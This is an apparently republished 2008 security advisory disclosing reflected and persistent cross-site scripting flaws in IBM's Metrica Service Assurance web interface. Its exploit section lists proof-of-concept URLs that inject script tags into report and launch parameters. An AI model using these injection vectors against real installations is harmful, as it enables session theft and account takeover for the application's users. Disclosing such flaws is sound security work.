Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20831
HistoryNov 10, 2008 - 12:00 a.m.

Metrica Service Assurance Multiple Cross Site Scripting

2008-11-1000:00:00
vulners.com
76

Metrica Service Assurance Multiple Cross Site Scripting


Author: Francesco Bianchino

Email: [email protected]

Title: Metrica Service Assurance Multiple Cross Site Scripting

Vendor: IBM


Summary

Metrica Service Assurance Framework implements a distributed,
object-oriented, J2EE-based architecture. It work with a Web-based
user interfaces, from end-user report generation to detailed system
administration and configuration.


Vulnerability Detail

The web-based interface of Metrica Service Assurance is exposed to
multiple XSS attack. With an authenticated user it's possible to steal
other user's sessions due to a flaw in the input validation
mechanisms.
A persistant XSS permits the insertion of malicious code into the
web-based interface. Using the report generation function it is
possible to create a report with malicious code in the name.
That code is than rendered on the victim's browser when opening the
report history which can be found in the main panel of the
application.
The code also persists into the main panel and all the users are
exposed to the attack.

There are at least three vulnerable pages:

  Non persistant:
  * http://server/<document root>/ReportTree
  * http://server/<document root>/Launch

  Persistant:
  * http://server/<document root>/ReportRequest

Exploit

http://server/<document
root>/ReportTree?action=generatedreportresults&elementid="><SCRIPT>alert("Non
persistant XSS");</SCRIPT><!–&date=0000000000000

http://server/&lt;document root>/Launch?jnlpname=="><SCRIPT>alert("Non
Persistant XSS");</SCRIPT>

http://server/&lt;document_root&gt;/ReportRequest?dateformat=dd&#37;2FMM&#37;2Fyyyy&amp;reporttitle=some_title&amp;reportID=some_stuff&amp;version=0&amp;treesrc=&amp;treetitle=&amp;p_wstring=&amp;p_dataperiod=none&#37;3A&#37;23&#37;3Araw&amp;startdate=01&#37;2F01&#37;2F2008&amp;reporttype=offline&amp;&#37;3Atasklabel=&lt;SCRIPT&gt;alert&#40;Persistant
XSS!);</SCRIPT>&none_agg_specified=false&windowtype=main


Solution

At the moment of writing this advisory the is no solution yet.


Credits

Discovered and advised to IBM, November 2008 by Francesco Bianchino.
Thanks to Marco borza and to da EthicalHAkinTeam